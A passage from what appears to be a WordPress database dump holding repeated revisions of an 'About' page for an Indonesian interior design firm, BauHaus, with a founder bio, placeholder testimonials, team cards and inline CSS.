	CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:52:21','2023-09-22 08:52:21','',38,'https://bauhaus.futuremediatrix.com/?p=4873',0,'revision','',0),(4874,3,'2023-09-22 08:57:41','2023-09-22 08:57:41','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:57:41','2023-09-22 08:57:41','',38,'https://bauhaus.futuremediatrix.com/?p=4874',0,'revision','',0),(4875,3,'2023-09-22 08:57:42','2023-09-22 08:57:42','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" 